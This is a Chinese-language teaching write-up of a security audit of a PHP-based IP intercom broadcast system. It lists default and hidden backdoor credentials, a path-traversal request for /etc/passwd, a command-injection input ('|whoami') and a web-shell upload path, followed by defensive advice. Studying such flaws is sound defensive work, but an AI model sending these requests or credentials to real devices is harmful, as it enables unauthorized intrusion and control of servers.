IP网络对讲广播系统安全审计教学文档

系统概述

IP网络对讲广播系统是一个基于PHP开发的网络应用，部署在Wnmp环境下。系统存在多个高危漏洞，包括弱口令、任意文件读取、命令执行和多个文件上传漏洞。

漏洞分析

1. 弱口令漏洞

漏洞位置：系统登录接口

发现方法：

• 默认账号密码：admin/admin
• 隐藏后门账号：administrator/800823（在JS代码中发现）

验证方法：

POST /login.php
username=admin&password=admin

2. 任意文件读取漏洞

漏洞文件：php/exportrecord.php

漏洞代码：

$downname = $_GET['downname'];
// 无任何过滤直接读取文件

利用方法：

GET /php/exportrecord.php?downname=../../../../etc/passwd

影响：可读取服务器任意文件，包括配置文件、密码文件等敏感信息

3. 命令执行漏洞

漏洞文件：ping.php

漏洞代码：

$ip = $_GET['ip'];
// 直接拼接执行命令
exec("ping -n 3 " . $ip);

利用方法：

GET /ping.php?ip=127.0.0.1|whoami

影响：可执行任意系统命令，完全控制服务器

4. 文件上传漏洞（共6处）

4.1 文件上传点1

漏洞文件：addmediadata.php

漏洞代码：

$upload_path = $_POST['path']; // 可控上传路径
// 无过滤直接上传

利用方法：

POST /addmediadata.php
path=../../shell.php&file=[恶意文件内容]

4.2 文件上传点2

漏洞文件：my_parser.php

特点：无任何过滤

4.3 文件上传点3

漏洞文件：addmediadatapath.php

特点：路径直接拼接，可目录穿越

4.4 文件上传点4

漏洞文件：addscenedata.php

特点：将../images/scene/与文件名拼接

4.5 文件上传点5

漏洞文件：busyscreenshotpush.php

漏洞代码：

$imagefile = $imagename;
file_put_contents($imagefile, base64_decode($content));

利用条件：

• imagename需满足格式：1_2_3.php

4.6 文件上传点6

漏洞文件：uploadjson.php

特点：接收文件内容和文件名参数，可路径穿越

审计方法总结

1. 指纹识别：确认系统是海康威视还是SPON世邦产品
2. 代码搜索：
   • 搜索admin关键字查找默认凭证
   • 搜索fopen查找文件操作漏洞
   • 搜索exec查找命令执行漏洞
   • 搜索$_FILES查找文件上传点
3. 参数分析：检查所有用户输入参数是否经过过滤
4. 路径追踪：检查所有文件路径拼接操作

防御建议

1. 修改默认密码，删除后门账号
2. 对所有用户输入进行严格过滤和验证
3. 使用白名单限制文件上传类型和路径
4. 禁用危险函数如exec、system等
5. 实施最小权限原则，限制Web服务器权限
6. 对文件操作进行严格的路径检查，防止目录穿越

工具推荐

1. 代码审计工具：
   • RIPS
   • Fortify
   • SonarQube
2. 漏洞验证工具：
   • Burp Suite
   • curl
   • Postman

法律声明

本教学文档仅用于安全研究和防御目的，未经授权对他人系统进行测试属于违法行为。